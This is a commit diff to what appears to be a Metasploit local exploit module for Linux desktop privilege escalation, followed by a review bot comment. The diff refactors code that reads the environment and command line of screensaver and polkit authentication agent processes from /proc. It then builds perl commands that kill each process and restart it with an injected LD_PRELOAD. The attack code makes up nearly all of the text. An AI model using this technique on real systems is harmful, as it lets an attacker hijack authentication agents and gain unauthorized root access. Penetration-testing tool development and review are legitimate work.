
Commit 36ac0e6

committed
Clean get_restart_commands
1 parent 92b3505 commit 36ac0e6


1 file changed

+20
-5
lines changed


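--- a/modules/exploits/linux/local/desktop_privilege_escalation.rb
+++ b/modules/exploits/linux/local/desktop_privilege_escalation.rb
@@ -109,29 +109,44 @@ def exploit
 end
 
 def get_restart_commands
-text_output = cmd_exec('pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";$/=undef;for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\'').gsub("\r","")
+get_cmd_lines = 'pidof xscreensaver gnome-screensaver polkit-gnome-authentication-agent-1|'
+get_cmd_lines << 'perl -ne \'while(/(\d+)/g){$pid=$1;next unless -r "/proc/$pid/environ";'
+get_cmd_lines << 'print"PID:$pid\nEXE:".readlink("/proc/$pid/exe")."\n";'
+get_cmd_lines << '$/=undef;'
+get_cmd_lines << 'for("cmdline","environ"){open F,"</proc/$pid/$_";print "$_:".unpack("H*",<F>),"\n";}}\''
+
+text_output = cmd_exec(get_cmd_lines).gsub("\r",'')
 vprint_status(text_output)
+
 lines = text_output.split("\n")
-process_restart_commands = []
+
+restart_commands = []
 i=0
-while(i < lines.length-3)
+while i < lines.length - 3
 m = lines[i].match(/^PID:(\d+)/)
+
 if m
 pid = m[1]
 vprint_status("PID=#{pid}")
 print_status("Found process: " + lines[i+1])
+
 exe = lines[i+1].match(/^EXE:(\S+)$/)[1]
 vprint_status("exe=#{exe}")
+
 cmdline = [lines[i+2].match(/^cmdline:(\w+)$/)[1]].pack("H*").split("\x00")
 vprint_status("CMDLINE=" + cmdline.join(" XXX "))
+
 env = lines[i+3].match(/^environ:(\w+)$/)[1]
 restart_command = 'perl -e \'use POSIX setsid;open STDIN,"</dev/null";open STDOUT,">/dev/null";open STDERR,">/dev/null";exit if fork;setsid();kill(9,' + pid + ')||exit;%ENV=();for(split("\0",pack("H*","' + env + '"))){/([^=]+)=(.*)/;$ENV{$1}=$2}$ENV{"LD_PRELOAD"}="LD_PRELOAD_PLACEHOLDER";exec {"' + exe + '"} ' + cmdline.map{|x| '"' + x + '"'}.join(", ") + '\'';
+
 vprint_status("RESTART: #{restart_command}")
-process_restart_commands.push(restart_command)
+restart_commands.push(restart_command)
 end
+
 i+=1
 end
-return process_restart_commands
+
+restart_commands
 end
 
 def c_code(exe_file)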
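Review bot: The cleanup leaves the three `.match(...)[1]` calls on `lines[i+1]` through `lines[i+3]` unguarded, so one record whose EXE, cmdline or environ line does not fit its pattern (an executable path containing whitespace is rejected by `\S+`, for instance) raises NoMethodError on nil and aborts the whole method instead of skipping that process. Capturing with `exe = lines[i+1][/^EXE:(\S+)$/, 1]` and moving on when the result is nil would keep the failure local; because the loop advances `i` by hand, the skip must still reach `i+=1`. The four-line record layout the parser depends on is also undocumented, and a comment above the loop such as `# cmd_exec output: one PID:/EXE:/cmdline:/environ: group of four lines per process, the last two hex-encoded` would explain the `lines.length - 3` bound. Separately, `vprint_status(text_output)` and the `RESTART:` line write the hex-encoded process environment into verbose output, so those logs should be treated as sensitive engagement data.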
